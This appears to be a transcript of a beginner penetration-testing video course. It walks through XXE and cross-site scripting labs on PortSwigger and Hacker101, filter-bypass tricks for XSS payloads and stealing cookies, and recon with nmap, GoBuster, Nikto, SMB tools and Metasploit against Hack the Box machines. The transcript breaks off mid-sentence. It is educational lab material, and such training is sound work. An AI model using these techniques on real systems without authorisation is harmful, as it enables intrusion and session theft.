image tag. So what I did is I had this, and I wasn't paying attention. I didn't read the instructions. I left this as Etsy password. And so eventually I was like, went back, read the instructions. Okay, this needs to be the host name. But I still had this image text in, and I was trying to figure out how I could call my XXE payload here through this tag. And I spent quite a bit of time, and finally I just deleted it, and that was when I decided I was going to add in my own tag, and that's when I added in the text tag. And that was when I finally had some success. It was when I finally went through and changed this, added in the text myself, and I went ahead and I just added in random numbers. I'm fairly certain this does not matter what you have, nor does this matter, nor does the order of this stuff matter. This does not need to be in any specific order. And so I had quite the trouble trying to figure out how to call my file. And sometimes you will be able to make an upload, and you will not be able to call it. You'll be able to post it to a server, and it may take a while for it to call, and somebody may have to call it, or it may have to just be on a cycle when it reboots and it calls itself. But we don't actually have Burp Collaborator hooked up to our system because we do not have the Pro version. So we would have to have the Pro version to do some of these other challenges. So a lot of these challenges require the Pro version to have Burp Collaborator, and we don't have that. So some of these we're not going to go through. The other one we're going to do is going to be the one at the very top, the very first one, and you'll kind of get a little better understanding of what I mean by why we have to call this, why we have to have a tag with our text, and we'll have to have our XXE here to call it. And you have to call this in a way that the server can understand it. So you can't just put anything in here. It needs to be some way that the server can understand it. And so I want to go ahead and give you the challenge of solving this first lab right here for the XXE. And I'm going to give you a little bit of a clue here. The way you're going to find, or the way you're going to call it, is actually given to you in your Burp request. The request you get, you will actually already have the place, the tag in which you're going to call this provided for you. So when you come in here, You can look, you can read through this. You should be able to find it on your own. You should have enough information at this point on how these work to solve this challenge. And I want to go ahead and give you this challenge. And if you struggle with it, we will walk through the solution in the next video. Okay, we are going to go ahead and finish our final XXE injection. This one is pretty simple. It is one that I have given to you as a challenge. I think you can solve by yourself, but if you haven't, let's go ahead and start walking through it together. So you can go ahead and open this file. You can read the instructions. This lab has a check stock feature, and it's going to use the XML, and we're going to pull down this file. So you go ahead and open up this lab. Once you're in here, you can just view details to one of the products, and it's going to give us this check stock option. We'll go ahead and open up Burp, turn the intercept on, and you can go ahead and pause the video again if you were not able to find this challenge and give it a try. If not, we will continue. And so we'll check the stock, and right here you can see our XML file. We'll go ahead and send this to repeater. We can turn this off. And now what we're going to do is we already have our version and the encoding. So I'm going to go ahead and actually just paste in the first part of this payload so that way you don't have to watch me type it all out. And now to call our XXE, if you remember, we have to call it somewhere. Before, we had just been making ways to call it on our own. This time we have the product ID, which is where we're going to call this. We'll just type in our XXE, and then we should be able to send this, and it will pull down the file for us. And there it is. So that is the external entity injection. There are going to be a lot more complicated ways to run this that are we're unable to go through them because we don't have the Burp Pro. But in the future intermediate and advanced courses, we will go through these more difficult ways to pull down the external entity injection. And with that, I will see you in the next lesson.
Okay, one of the most common vulnerabilities is going to be cross-site scripting, or it's also known as XSS, or yeah. And this vulnerability is common, but it's also going to be pretty hard to exploit without knowing some form of HTML and JavaScript. So there are basic payloads that you can go in and you can just test a bunch of them. And I'm going to show you a list that I found. It's got over 6,500 different ways to try and exploit this, but most of the time you're going to have to inspect the page and modify the content. But we'll get to that in just a little bit. I'm going to show you just a couple of cross-site scripting examples here. And then I kind of want to show you the code of what's going on. I think you'll be able to understand it even if you know zero programming. So with that, we'll go ahead and I'll show you an example of what cross-site scripting is, and then I'll explain why it's so dangerous. And so this is going to be the most basic, simple form of cross-site scripting. And so all we want to do is have an alert pop up. And if you can pop up an alert on a bug bounty program, you will be able to submit that for a vulnerability. And there you'll see them a lot of places. A lot of people like to look for them. I don't really look for them all that often because I think most people look for these, and if it's not stored cross-site scripting, then you're not really going to get paid for the amount of time that you put in. You'll get paid, but just not enough for the amount of time it's going to take to find them. So we're going to do this with an image. An image tag, so we'll go image source equals, and then we leave it blank. And when this is blank, it's going to make an error on the page. And so on error, we want to alert, which is going to give us the ability to pull off the cross-site scripting. And we're just going to alert 1, and then we will close the tag. And I have made a mistake somewhere. Let's go ahead and delete this equal sign. There it is. So we have the alert pop up and it says localhost 1. Now what you can do with a cross-site scripting and why it's so dangerous is not because you can just pop things up on somebody's screen, but what you're able to do is you could make this look really fancy, and you could say log into a Wi-Fi or log into this page, or you were accidentally logged out, and people can type in their username and their password, and then all of a sudden you have their credentials. You can put alert document.cookie right here, and then all of a sudden you can steal their session. And so there's quite a few different ways that you can use this to get malicious with it. And so that's why it's so dangerous, but it's also really common. It's going to be in the top 10 vulnerabilities that you're going to find on pretty much any list. And so right here is a different version. So right here is just plain as can be. You can type whatever you want and nothing's going to get blacklisted. So right here I have made a little, it's really short, it only has the image tag, but you can type your script. The image has been blacklisted. So what I mean by that is if you watch what happens, I finish typing image and it automatically deletes it. This will happen on programs that you're going to test. They'll have characters that are blacklisted. I have come across it. I come across it regularly. I have come across blacklisted characters when I was trying to do a SQL injection. So you'll come across blacklisted characters. What you'll do is you can go out and you can find encoders and you can encode your payloads in order to fit your specific needs. And in this case, it's pretty simple. All you have to do is go I and make a capital M and a G, and it doesn't get deleted. Or you could go capital I, M, G, and this is a way that you'll find, especially in Capture the Flags, to bypass blacklisted characters or words. Is you just change it a little bit, or you can encode it and you can bypass the filter. And so we could do the exact same thing that we had done before. So we'll go on error equal alert, and then we'll just do alert 1, and then we'll close it off. And there's the alert. So all we really had to do was just change the image tag, because the image had been blacklisted, but we were allowed to pull up a different version of the image tag. And so what this looks like, here we have banned characters. So you can have banned characters such as these. People will ban these characters so that you can't inject your code into it. But I will show you. So in this case, I actually ban this character, the backslash. So no matter how many times I push it, it's not going to come in. But you can still ban this. You will find the backslash ban, because if you can't close a tag, then it's going to be really hard to pull off a cross-site scripting. Not impossible, but you can still do it. So what this looks like is I am just replacing the image with an empty string. And over here we have the banned characters. You can see right here, you're not allowed to use those, and I replace them with an empty string. And so this is what a blacklist would look like. You just have a bunch of characters listed that are blacklisted, and you're not allowed to type them in. So when you have a banned backslash, which you're probably only going to see in Capture the Flags, something like this, but what you can do is you can actually make a button tag like this. If I can get that right. There we go. And then you can just type something in here. And then what you can do is you can type in on click equal, and then you do the same thing. You'd put your alert, and we'll put our 1, and we don't have to have a closing tag. We don't have to close that. So we click it, and there's the alert. And you will see this in one of our practice, when we practice the cross-site scriptings. So those are just a few ways you can pull off the cross-site scripting. I want to show you a page that has a ton of cross-site scripting payloads, and here it is. You can actually just Google cross-site scripting payloads, which we'll go ahead and I'll just do it right now and walk you through it. We'll just type in payloads and just click the first one, and here's going to be a list, so you can get an idea of how many are out there and different ways you can do a cross-site scripting. And so this is why I'm telling you there's a lot of different ways to do these. We'll actually see one similar to this in just a few lessons, because we're going to have to close off a tag, and then we're going to have a character blocked, and then we'll actually be able to insert the payload. So there's a ton of different ways to pull these off. It's going to require some knowledge of HTML and JavaScript, or you can, if you're on a capture the flag, you can just go to burp intruder, and you can just send this entire list until you are able to receive the solved challenge. But with that, this is a basic introduction into cross-site scripting, and we'll get a little more hands-on, and I'll have you guys start practicing writing your own payloads in the coming lessons. I'll see you there. Okay, for this challenge, I want you to come to the HackerOne or the Hacker 101 CTF. This is HackerOne's practice site for us to practice what we've learned. And you can come in here to the easy with 2 flags and click go. If you would like the challenge, we have already saw the XSS in this challenge. I showed it to you in the last lesson. So if you want to go ahead and look for it on your own, you can go ahead and do that. I think you have the knowledge to solve this challenge all on your own without any help, but I will do a walkthrough here in just a second. So if you would like the challenge, you can go ahead and see if you can find the cross-site scripting, and you can do that now. Okay, once we're in here, you can go through, and one of the first things, if you remember from the recon lesson, is to click through and just open up everything in the page and just see what you can find and what you can do. I actually just thought of another way to try and solve this challenge that I might try and see if it works. And then you can come back and you can go back to the home page, you can create a new page, and you can just click through and see what you can find. But in the markdown, they actually give us a clue as to how to solve this challenge. You have this random button here. It doesn't do anything, but if you edit this page, we have the tag for a button. So if you were unable to find this, you can go ahead and try and solve the challenge now. Because if you remember, if we have a button, we can come in here and we can go on click, and then we can put in our alert, and then we can put in 1. And so we have our on click here, and it's closed off, and we should be able to save this. And on our click, we are given the alert. I just thought of, I bet we could copy this. There's another way you could have solved this. If you didn't see this button here, and you didn't have this clue, but you came into the testing and edited and you saw this, you might have thought to go ahead and just insert your own button, and you could have pulled off the same thing just on a different page. And we'll go ahead and change this to just click, just so you can see it's a different button on a different page, and we could have done the same thing. So that is another way that we're able to pull this off, and we're going to see a couple of more examples. And the reason for this is the cross-site scripting is a rabbit hole that you can go down indefinitely. There are thousands and thousands of different ways to pull this off, and so I just want to show you the basic introduction into cross-site scripting, because without knowing HTML and JavaScript, it's going to be kind of challenging to pull these off. And since this is a beginner course, I'm not really expecting any software developers to be in here wondering how to do a cross-site scripting, because if you're a developer, you're going to already know, because you will have had to write code to defend against it. And so with that, I will see you in the next video. Okay, we are going to come back to Port Swigger, and we're just going to do a few of these just so you get an idea of how cross-site scripting works and how people can attack it, and just a little more understanding of seeing these in context of how they relate to pulling off these vulnerabilities, especially to beginners, as you can just copy and paste some of these into search engines and search bars, and you will see them on HackerOne in the Hacktivity, and just so you understand what's going on. So we'll go ahead and open up this first lab here, and we will be told what we are supposed to do. So we're supposed to call the alert function in order to solve the lab. And this one is going to be one of the most basic cross-site scriptings that we're going to see. And one of the common ways to check to see if a website or a web application has any defense against cross-site scripting in a search bar like this. What you can do is you can come in here, and this is basic JavaScript. So we just type in script, and then we type alert 1, and then we close the script tag. So this is just a basic JavaScript command here I can type. And so if this has no sanitization, then this should work. And you can try these in search bars. You can try them and post this script to any kind of social media outlet for the web application and see if it pulls back any cross-site scripting. So we'll go ahead and search this, and it says we have timed out because I opened the lab before I started this video. So we'll go ahead and reopen the lab and let that load. And we'll go ahead, and once this is loaded, I will actually just paste that in. Go ahead and paste that in, and we'll search it. And it pulls back the alert. We were able to alert 1, and it says we have solved this challenge. Now in the next challenge, we are going to go over the DOM cross-site scripting, which I actually think is down here, because this is one that we have seen with the inner HTML, this one right here. So if you would like to go ahead and open this up and give it a try and see if you can get this to pull the alert, we have looked at this payload before. It's not new to you. You will have seen it. You can go ahead and try and find it on your own, and I will see you in the next video. Okay, so how did you get along with that challenge? So we can actually come in here. This is the lab we're going to be working on. We can open it up, and we're going to be setting what we type in to the inner HTML, which means what we are typing in and searching for is going to be saved on the client side, which means it will try and render it. This is what I set up when we looked at the very first examples on the application that I tried to give you examples. If you go back and look at it, this says dangerously set inner HTML, which is just inner HTML with the React framework. And so this is going to be the exact same type of vulnerability that we have already witnessed at the beginning of this section on cross-site scripting. So you can go ahead and open up the lab, and we'll have our search bar, and we're going to be doing essentially the same thing we did in the beginning, where what we type in is going to be rendered on this page. And so we can type in our image, and then we'll do our source, which is where it's going to look for the source. You can actually type anything in here. And so it's going to look for a file saved within this application with this name, and it's not going to find it. And so that's going to cause an error. And what do we want to do? On error, we want to alert, and then here you would put your proof of concept, because we just want to prove that this works. And you can type in XSS, or you can type in 1, or you can type in whatever you want. And we will go ahead and close that off, and we can search this. And there is the alert for us. And so with that, that solves this lab. And we're going to try one more, and I'm going to show you kind of, this is a little more towards the intermediate level of cross-site scripting, but it's just a way for you to know more about cross-site scripting. And if you come across it and you really think there is a cross-site scripting vulnerability in a website, just how you can work through that and maybe do some more research on your own to try and exploit it. So I'll see you in the next video. Okay, this next lab is going to be one that is going to give an example of what it looks like to start looking for cross-site scripting in a little more of an intermediate or advanced way. This is going to be probably the most common way that this is going to be found, because you're going to have to inspect the element and know how to break out of the HTML or the string that you're stuck in order to pull off JavaScript and run it within the application. So we're actually going to go ahead and open up this one right here, and it'll be over here. It'll tell us what we need to do, and we just need to break out of the JavaScript string and call the alert function. So I went ahead and opened this up, and the most common way to do something like this is type in something that you can remember what you typed, or something really easy to find. So we'll type in 1, 2, 3, 4, and we'll hit search. And now what we'll do is inspect the element, or you can view page source. We'll actually do that. That'll be a lot easier to see. So we'll view page source, and then we find our 1, 2, 3, 4, 5, but this is not where we're going to be breaking out of this. See, this is a script tag. The search term right here, we searched for 1, 2, 3, 4, 5, and we have the closing script tag here. So in order to close out of this, we can actually put a script tag up here in our search query, and it will close all this off. This script tag will match this script tag, and then we should be able to open up a new script tag, and it will run in the order. It'll run all of this in the order that it is laid out, and then we should be able to put in our payload. So we'll come back to our lab, and what we should be able to do is close off the previous script tag. So that will close this tag, and everything before it will be inside that tag. And then we should be able to come in here and type in our own payload. And so we'll go script alert, and we will just alert 1, and then we can close off our payload. And look at it, make sure it looks right. And that should work. And then we'll go ahead and search it. And there is the alert, which means we've solved the challenge. And everything after that script tag will get rendered on the page because it doesn't have an opening tag. If you're wondering why this showed up. So we'll go ahead and we'll look at the page source and I'll show you the difference. See, here is where we closed off that script tag, and then here we put in our payload, and then because this script doesn't have an opening tag, this just gets rendered on the page as plain HTML. So if you are unfamiliar with programming, this probably doesn't make a whole lot of sense to you, but when it comes to cross-site scripting, it's kind of going to be necessary to understand HTML and basic JavaScript in order to pull this off. But the reason I included this in this beginner course is because cross-site scripting is one of the most common vulnerabilities, and so I wanted you to be aware of it, and maybe you can practice it and see if you can get better, or if you want to, before you take the intermediate course, is go learn some basic HTML and some basic JavaScript. It won't take long. You can learn HTML in a week. You can learn CSS, which is how to make a website look pretty, in a very short amount of time, a couple of days, and then you can learn basic JavaScript probably in another week. It doesn't take long. It's pretty simple to learn. And so I wanted to show you cross-site scripting. I want you to be aware of it. Like, look at how many cross-site scripting labs exist on Portswigger, and I think they actually have, yeah, DOM vulnerabilities, so even more cross-site scripting. So there's a bunch of cross-site scripting. It's really common, but it does take some programming knowledge to solve. And so with that, I will see you in the next video.
We are going to begin doing a little more in-depth network scanning, as it's going to be needed going forward from this point. And so one of the most popular tools that is used is going to be Nmap, and this is a really helpful tool. I would say most every penetration tester will run this at the beginning of any test or with any virtual machine or box that you are going to be testing against. And so this is the script I like to use. I want to walk through it real quick and then show you what output looks like. And then in the next video, I'm going to give you some notes that I use, that I found online when I was learning, and they've been really helpful, and I think they'll help you guys as well when you see the output that we get from the scan. But before that, let's go ahead and start. This is Nmap. This is the name of the tool. You can just type in Nmap and it will bring up the tool. You don't actually have to type anything else because it's in our path. And then also the T3 here. This is our speed that we want to run the scan. It runs at T3 normal. This is if you delete this, it is going to be running at the T3 speed. Some people like to speed it up and will run like a T4 or even a T5. I don't like to do this because sometimes it will miss ports or it will error out, and I just don't think that it's worth saving an extra two minutes for that. The -A will run all of the different types of scans, which we're actually going to look at when we look at the nmap-help. The P-P runs all ports. I think there are 65,535 ports. The P-P will scan every port. You don't have to run this this -PN, but I like to run it because sometimes I'll get errors on different ports, and what this does is if you don't have this in here, it will actually send out a ping to each port, and if it doesn't receive a signal back, it will go on to the next port. And so I like to have the -PN in my scans because then it actually will scan the port no matter what. It takes longer but this is my preference. And then also throw in your IP address that you're going to be scanning against. But I like the -V. I actually just started using this a few months ago because it will actually put out the ports that it finds as it's scanning. So before I would run it without the -V, and I'll just show you. We run it and we just sit here and we wait until we eventually finish the scan. And if we go ahead and we run this with the -V, you'll see that as it is going, look, it's already found port 21 and port 80. Now I know port 21 is going to be FTP and this is going to be a web app, and I can go ahead and I can begin numeration on these different ports, and I don't have to wait for the scan to finish. And also forgot to mention that this -A will do the OS detection as well as tell us more about the ports. It'll do some of the enumeration for us. And so when the scan is complete, it will look like this. And so it will tell us we have FTP. It'll tell us we have anonymous login, which means we're allowed to log into the FTP. And this tells us that we have HTTP port 80, and this is the software that it's running. So we could actually copy this, paste it. We can see if ExploitDB has anything against this, if there's any vulnerabilities against this software. And so this will go ahead and it'll tell us this is a Windows machine. And so Nmap gives us a lot of information, and this is very basic. 2 ports here. Usually if you're running against some kind of exam or some more difficult boxes, you will have like 20 ports open and you will have to enumerate all of them to try and find the vulnerability. And so we're not going to get too much into that now because this is just a overview of Nmap and not actually how to do further enumeration. So one of the things that you will end up doing is, I'm sure this script that I run, you might start out using it in the beginning, but eventually you're going to find your own preference and what works for you. And one of the quick ways to see the different types of things that Nmap can scan for is to type in nmash-help, and you can go ahead and look at all the different flags that are in here, and you can figure out exactly what you like to run. The -SC is really popular. The SV is really popular, and I believe if we scroll down, the -A says it enables OS detection, version detection, script scanning. It does all of those things for us, and so that's why I use the -A. It takes longer, but it saves you from having to type in all these other flags and trying to remember exactly what you want to scan for. So this is the script that I like to run. And if you have any other questions about Nmap, don't be afraid to ask. Nmap's a really helpful tool, and sometimes I will play with different scripts just to see maybe I'll like something different. That's actually how I found the -V. I found that after several tries, I really enjoyed not having to wait because I'm impatient and just being able to go, okay, this port is open, this port is open. And while the scan runs, I can go out and I can be doing other things and finding more information about the target IP address. So with that, that concludes our overview of Nmap, and I'll see you in the next video. One other tool I wanted to cover is Nikto. This is a tool, I don't use it probably as often as I should. It is kind of a vulnerability scanner. It'll go out and scan the IP address that we put in here, and sometimes it actually is really helpful, and it will tell you, hey, these are versions that are out of date, and maybe you should go and check these specific versions. It helps you with your enumeration. Sometimes you might miss something and it will tell us. So we went ahead and ran it. It tells us the server. It tells us what it's running right away. We saw this on the Nmap scan as well, but sometimes this tool will go out and it will scan on the web app or different areas of the network, and it will just say, hey,
this is out of date and it might be vulnerable to this specific exploit. And it'll tell us like if it isn't patched, then this exploit will work. So sometimes this can be helpful. I think it's actually helped me solve a few boxes when I first started. So this might be something that you might want to run. I am not an expert with Nikto. Like I said, I don't really use it a whole lot. If I run this, it looks exactly like this. This is exactly how I run it. And I know that Nikto actually has a help page as well. And so there's a lot of different flags that you can use with Nikto. You can see them here. And you can use this in different ways. You can play around with it and see if it's something that you like or something that you want to use. I probably will not be using Nikto throughout the course, but it's something you should know about because you will hear people talk about it, you will see it, you will see Nikto scans, and it might be something that you really like. Go ahead and use GoBuster for part of this course, especially as we're doing network testing, because I find that it's a little more helpful. It does a little more advanced enumeration than DERB, which I showed you earlier in this course. And so you can really use either one, whichever one is your preference, but also you can use DERBuster. It's also really good, and it does basically the same things. The only difference is it has a graphical user interface, and it's more hands-on and being able to see what you're doing and clicking buttons. But the first thing we're going to have to do is we're going to have to install GoBuster because I don't believe it comes with Kali Linux. So you just type in your sudo apt-get install, and then you'll do a GoBuster like this. And I already have it installed. I'll go ahead and show you. Here it's installed. It'll take a few seconds. It should take maybe 30 seconds to install. And then we're going to give a look at how we use it and what exactly it does that's a little more helpful than using just DERB. So I have pulled up the script. Actually, I'm going to delete this. And I'm going to show you like a helpful tip on what I like to do. We're still going to have a -w, but we're also going to have to switch directories. So one of the things I like to do, instead of having that huge path here to get to this word list, one of the things I really like to do is I like to go into my desktop. So CD over to your desktop and then make a directory. And I like to make one called lists. So this is where I'll keep all of my word lists, my brute forcing lists, my number lists, and all the different lists that you can think of. And we'll go ahead and copy that one that we just saw. So it'll be, we're gonna copy, and I believe it's our user share. Okay, there was a lot in there. I think it's wordless. It is, it's wordless, and it will be under DERBuster. Did I mess something up? Yep, DERBuster directory, and then we'll go dash list. I got a U in there, dash list, and it should be 2.3, and it's our medium text. And then I will just say this as derb.txt as the output. And I just realized that I'm going to be saving this into my desktop. So actually what we'll do is I'm going to run that CD into lists, and then I'm just going to tab up. And then if we ls, we now see we have this derb.txt. So then when I run GoBuster, I will go ahead and I'm going to switch over here. And so you can see what this looks like. And I'll have GoBuster. And then it tells us we're going to be doing directory busting. This is our U for our URL. And then we have the IP address, which would be the domain name that we're going to be running this on. And I can actually go ahead and run the derb.txt. And if I start this, it'll go ahead and it will start brute forcing, looking for different directories for us, begin doing enumeration on. But what I like to do with GoBuster that I think is a little more helpful is sometimes you will see a URL that will look like this, and it'll say
login.aspx, or it'll say .php. And so this will tell us that we have PHP running, and so we might need to add a .php in order to pull up different directories and subdomains. So what I like to do is come over here, and the -x will tell us what extensions we want, and you can put PHP, and you can put ASPX, or you can put HTML, or whatever the site requires, and you can actually just add a whole bunch of these. And for every one of these that you add, though, it is going to take much longer. And so you have to be ready to go ahead and kick off this GoBuster scan, and just know if you're running a whole bunch of these extensions that it's going to take a while. And this actually will save you. Sometimes you'll be in a box, or even in some exams, they'll try and trip you up by adding in a login.php or an admin.php. And if you just run GoBuster and you don't have this extension, you will never find that page. And so this is something that you need to be aware of. We will run into this in this course. You will run into this in the future when you're out on your own. And sometimes you'll even come up against this in exams, or if someone's trying to do a box for an interview, they might throw this in there. So be prepared and know what you're looking for, and know that you can use this extension with GoBuster.
Another way that we're going to see connections is going to be through SSH, and we'll see this when we do more enumeration here in the next few videos. But I wanted to go ahead and cover SSH so that way when we see it in a port scan and we say, look, port 22 is open, there's SSH, you would know what we're talking about. So SSH is when you actually have the credentials necessary for logging into the server, our victim server, remotely. And there's a few ways that we would come across this. Maybe we can use it as a form of privilege escalation, or just to get our initial shell. We may come across a text file that has credentials stored in it. Sometimes GitHub files will actually have credentials stored in them on your target web app. If you're going after a web app, sometimes people will hard code their credentials by accident, and you can be pouring through GitHub and find credentials, and you can SSH into the machine. It's pretty rare, but it does happen. It's more likely that you will find credentials some other way, and you'll be able to SSH into the server and get a shell. So I actually have another machine over here that is open. I just opened port 22 on it, and we're going to go ahead and connect to it. So what we'll do is we just type in SSH, and I actually connected to it already, so there is the command. And so you just type in SSH, the host name, which is really important because sometimes the host name will be like Fred, Tom, Tina, whatever the host name is, and then the IP address. And when you hit enter, it's going to prompt you to fingerprint the machine. You'll hit, I think it's Y or yes, and then you'll go ahead and you'll type in the password, and then you'll then have a shell on your attack machine. So we go ahead and type in yes, and then it prompts us for the password, which this is the credentials for the victim machine that we have found. So it would be the password that we found, say, in a text file, and we hit enter, and we now have our shell. You can actually see the terminal itself has changed, and whenever we type in who am I, it's going to tell us Cali because that's the host we just logged into. But that is that's how we SSH into another machine. We're going to cover this more in the coming videos, but when you see the port open in the next few enumeration videos, as we do in-map scans, when we say the port 22 is open, there's SSH, but we need credentials, now you know what we're talking about. And I will see you in the next video.
Okay, I have a few GitHub note pages that I found helpful when I was new to penetration testing that I think will be helpful for you. And sometimes I actually will remember, like, oh, I need this specific tool, I need this specific function, and I don't remember exactly the syntax on how to use it, And so I will still sometimes come back to these notes pages that somebody else made, and I will still use them. And I will show you in just a second. I actually came across a tool that I haven't used in several months, and I thought, man, I forgot that even existed. And I have used some of these tools before that I've forgotten about that have helped me get into specific networks. And so I'll show those to you here in a second. But just coming off of our in-map scan, this is something that's really helpful when you're starting out. This tells us, this is our enumeration guide. This tells you how to enumerate all of these different ports that can come up on an nmap scan. And some of the ports aren't in here, but Google will be your friend there. But this is really helpful. So if you see port 21 and you think, okay, I remember how to enumerate part of it, but I can't remember exactly how to enumerate the whole thing, you can come in here and it will take you to port 21 and it gives you an nmap scan. And I think at the end, all you would have to change here is the IP address, and then you can fire it away. And you have your telnet, and you can come through, and there's just a ton of different ways to enumerate different ports. And what will happen is eventually you will have done this enumeration so many times that you won't be coming back here near as much, and you'll remember the syntax and you'll remember how to do these things. So when you scroll through here, it's going to look really daunting, and you're going to think, there's no way I can remember all of this stuff, and that's okay. You don't have to remember it. You can just go through your nmap scan and you'll see port 443 is open, which usually you'll have port 80 open too, or you'll see 135, 145, 139, 140, or 445, sorry. I'm really struggling here. Port 135, and these are actually really common. And personally, I actually enumerate these more towards the end, and I might actually get in trouble for doing that by some people, but when you're doing a hack the box or a try hack me, and even on a lot of exams, these ports are dead ends. Now, I'm not going to say they always are, because sometimes vulnerabilities will pop up here, or sometimes you'll have an anonymous login, or you'll be able to pull down usernames, but really, I usually enumerate these more towards the end. But you'll see these really, really common. Port 22 is really common. 111, you'll see 110. You will find this really helpful as you are going through and trying to enumerate ports on your nmap scans. Here's another one that I think is helpful. It tells you the methodology. It's basically the same as one we just saw over here, with a little bit of help. So this will tell you, okay, when you find a port 80 open, what do you do? Well, you'll run your Nicto, your dirbuster, your gobuster. You'll have burp open, so you're pulling in all of those get requests and your post requests that you can go back and look through, and it'll tell you how to do some other enumeration, your nmap scan. This is what the other page told us, the different tools we can use to enumerate. This is the site. I actually was just scrolling through here, and I came across, let's see if I can pull it up. This tool right here, oh, it was at the top, is one that I have used in the past. It will pull down all the common words on the web app and make you a password brute forcing list. And I actually forgot about this tool. I have not used it in several months, and so I don't usually come to these sites, but I pulled them up for you guys because I thought they'd be helpful, and I just saw this and I thought I should actually come back and read through these, because I am sure I have forgotten more than just this one tool right here. And then finally, this website here, the OSCP survival guide, mostly gives you different attacks, and it actually will give you a lot of scripts and a lot of syntax on how to run specific tools and different commands in the command line. And so a lot of this stuff we're actually going to go over later, but it is helpful, and this is probably going to be the most overwhelming if you look through here, but trust me, a lot of this is, you'll get used to seeing it, and it's not as daunting as it looks. And so this is probably the page you're going to use the least
but I thought I'd throw it in here just in case, because you will have to clone things from GitHub, and so it's helpful to see this, to know that it's here, to know who is. We already went over some of this, and it just is a helpful page. You can look through it, read through it. This is the page I use the least. This is one that I just don't really refer to, and maybe eventually you guys will get to the point where you don't refer to these much anymore, but in the beginning I think they'll be really helpful. So with that, we'll go ahead and I'll see you in the next lesson.
I have decided that we're not actually going to go ahead and enumerate port 80 because a lot of the port enumeration for port 80 we've already done. So what you would do is you would say, okay, this is going to be a web app, so we'd come up to our browser and we would just enter the URL and it takes us to this website, and then from here you know what to do. You'd come in here, you can inspect, you can view page source, you would start up GoBuster, and you basically, we've done this, and you would know what to do when you come to a port 80. So one other thing that I think might be helpful that we haven't done is when you see port 80, you can often just come over here and you can just copy paste the version of Microsoft that they're running, and you would just paste this, and then you would just type in exploit. It already knows what we're going for, an exploit for Metasploit, and you can go ahead and search for this, and then you can go through and see if there's any exploits that would work if the software is out of date. So I just wanted to give you a real quick brief overview of port 80 because we've already done a lot of this. Port, it's a lot of web app tricks and hacking. So with that, we're going to go ahead and start our first box on our own and see how far you can get, see if you get stuck. So we'll go ahead and I'll see you in the next video. We see port 53 open. What we should be thinking is, what information can we get from this? Usually it'll be something of the sort of names or domain names and IP addresses, and so we're looking to get more information here, and there's a couple of tools that are really helpful here in getting information. And so it really just tells us the domain name server, the DNS, what information can we get here. And so one of the tools that we can run is NSLookup, and to run it, it looks just like this, and we just run it and hit enter. I believe here we don't pull anything back, but that's okay. There's other things that we can run. We can run Nmap and see what we can get from an Nmap scan, but I don't really want to run Nmap right now. Pretty much there's an Nmap scan for just about anything. So if you were like, I want to run an Nmap scan on port 53, you would just open up Google and you could just type in Nmap scan port 53, and you'll find a bunch of different Nmap options for running a scan here. But one of the things I want to go through is the information that we can get from a zone transfer. And so this is, I think, probably the best way to approach this. And so you can just open up a clean terminal here, and we just type in DNS recon, and then we'll type in our -d and our IP address, and I already ran it, so I already have the command, and so we have this open, and so we have these flags, and it's going to go out for us, and it's going to pull the recon for us, and we'll go ahead and run it and see what we are able to pull back. And it says we find nothing. This is actually pretty common for port 53. There's not usually a lot that you will pull back, not a lot of information that you're going to find that you're going to get. And so I actually wanted to show you one more option. This is something you're not going to be able to use in certifications or exams, but I told you we'll go ahead and go through Metasploit, and so we'll just type in MSF console, and this will kick up. And then there is also
a way to use DNS enumeration here. So what we'll do is we type in use auxiliary and gather enum for DNS, and then we hit enter. And so this is what we're going to be using, and then we type in options to see what is required to run this, and it looks like we just need the domain, so we'll just type in set domain 10.10.10.103 to the IP address, and then you can type in options to make sure it worked, and then you just type in run, and it will go ahead and see what it can find on port 53 for us, and unfortunately it comes back with nothing. These are a couple of different tools that you can use when you see port 53 open, and yeah, so we'll see this in future videos and future lessons, but here's a few tools for you. So next time we see it, I'll probably challenge you to go ahead and enumerate port 53 all on your own and see what information you can find. And just remember, it's okay to come back and reference videos. I Google stuff all the time. The best point to know is to know that there is something in Metasploit, and so you can actually just Google Metasploit and port 53, or you can go, okay, I know there was a DNS recon, and you can go ahead and look up DNS recon on Google, and it will give you the syntax. So with that, take courage, and I'll see you in the next video. We are going to go ahead and enumerate 139 and port 445. These two ports go together. 139, you're going to see NetBIOS running on this port. It is used to communicate between computers within a network, and so when you see port 445 or 139, you can think there's Active Directory and there are ports communicating, and these are enumerated with a couple different tools we're going to see just a second. So the first one that we're going to look at is SMB client. The -N stands for no authentication, which means we have no username or password, and then the -L is to list, and it's going to go ahead and list out any users for us that we can see or share names. And when these list out, you're going to see admin. A lot of these are pretty standard, but the one that stands out to me is the department shares. And so there's a couple different ways we can look at what's inside this share folder. You can try and mount the department shares directory, or we can run another tool, which is right here, SMB map. SMB map is going to go ahead and it's going to take the host name, which is our IP address, the user, we're going to log in anonymously, and R stands for recursively, so it's going to go out, it's going to reach into each directory, and is going to pull out more directories that are in there, and we'll see if we can get back anything interesting. If you go ahead and run this, it is going to take a while because it's going to try a lot of different ways to go into different directories with inside directories. So we'll go ahead and send that now. Okay, so it has come back, and we'll go ahead and scroll through here. We're going to look at the department shares because that was the one that looked interesting, and look to see what came back. It tells us we have read access, we got department shares archive, and then this is one that looks interesting, department shares users, and then a list of users inside the users folder. Now what we would do normally is go ahead and mount the department shares and go into users and see if we can find any more information, but we're not at that point. I was just kind of showing you different ways to look at what information we can gather from these two ports. And so here's kind of what we would do in this case. Now obviously we would do a lot more digging, and we would spend a significant more time going through everything that we have found, but for now we're going to go ahead and leave it here, and we'll do more of this in the coming videos. We're going to be doing devel from Hack the Box and I kind of want to see how far you can make it on your own. So we see port 21 is open. We've already covered a little bit of port enumeration for port 21. It has anonymous login. So I want to give you a challenge. I want to see if you can go ahead and log in there anonymously, and then port 80, open it up and maybe research the version here and see if there's anything you can find that seems fishy. And if you want to have that challenge, you can do that now. Open up port 80, and so our IP address is 10.10.10.5, and we have a basic web page here. So what we're going to do is we can come over here, we can open up our GoBuster, and we'll actually just use dirb because it's really easy to use. So we can just 10.10.10.5. It says we need to type it in this way, http// there we go, and we'll get some kind of enumeration going in the background. So we have that going, and then we'll then open up a new page, and we'll go ftp 10.10.10.5, and it says a name anonymous. You can just hit enter here, or you can type in some random keys, and it says we're on. So we can ls, we can see what is on this box. It says there is a directory, and then there is this file here, and then there's the welcome.png. So one of the things we might try to do to see where this is located is we can come here, and we can see that we can actually go to this page. So the files that are being put on this FTP are actually going straight to the web server. So we can actually go ahead, go back here, and we should see what we can do with this. So this is the same directory that we're in right here, same working directory. So what we'll do is we'll gedit 